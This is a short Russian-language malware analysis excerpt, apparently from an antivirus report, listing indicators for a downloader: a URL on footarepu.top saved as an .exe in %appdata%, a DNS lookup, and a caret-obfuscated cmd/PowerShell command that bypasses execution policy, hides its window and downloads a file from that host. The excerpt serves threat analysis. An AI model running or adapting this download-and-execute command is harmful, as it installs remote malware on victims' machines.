Техническая информация
- http://footarepu.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "pow^E^RShelL^.e^X^e -ExE^cU^T^Io^nP^O^L^I^cy byp^A^S^s -nOpr^o^FILE -^Wi^nDoWst^Y^lE ^HId^DeN (New^-OBjEC^T^ SY^S^Te^M.ne^t.^W^EBc^LIenT).D^oWnlo^a^d^fIlE(^'http://footarepu.to...
- DNS ASK fo###repu.top
- '<SYSTEM32>\cmd.exe' /C "pow^E^RShelL^.e^X^e -ExE^cU^T^Io^nP^O^L^I^cy byp^A^S^s -nOpr^o^FILE -^Wi^nDoWst^Y^lE ^HId^DeN (New^-OBjEC^T^ SY^S^Te^M.ne^t.^W^EBc^LIenT).D^oWnlo^a^d^fIlE(^'http://footarepu.to...' (со скрытым окном)